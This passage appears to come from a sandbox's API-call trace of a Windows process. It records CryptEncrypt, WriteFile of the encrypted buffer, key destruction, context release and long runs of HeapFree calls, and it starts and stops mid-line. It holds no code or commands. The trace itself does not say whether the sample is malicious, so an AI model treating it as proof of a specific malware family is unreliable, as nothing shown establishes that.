cchWideChar=13, lpMultiByteStr=0x43cb000, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0126.251] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49de9c0*, pdwDataLen=0x144e790*=0x11885, dwBufLen=0x11890 | out: pbData=0x49de9c0*, pdwDataLen=0x144e790*=0x11890) returned 1 [0126.252] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0126.252] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0126.252] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0126.305] WriteFile (in: hFile=0x2a0, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x11890, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144f194*=0x11890, lpOverlapped=0x0) returned 1 [0126.309] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0126.309] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.309] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0126.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca7a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0126.309] CryptDestroyKey (hKey=0x41ac100) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0126.310] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0126.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0126.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0126.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0126.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0126.311] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0126.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0126.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0126.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.311] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0126.311] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0126.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0126.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0126.311] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0126.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392298 | out: hHeap=0x1780000) returned 1 [0126.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0126.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0126.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0126.312] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0126.312] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0126.312] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392490 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0126.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0126.313] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0126.313] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0126.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0126.314] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0126.314] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0126.314] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0126.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0126.315] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0126.315] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0126.315] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921b8 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0126.315] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392298 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0126.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0126.316] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0126.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0126.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0126.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0126.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0126.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0126.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0126.317] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0126.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0126.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0126.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0126.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0126.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 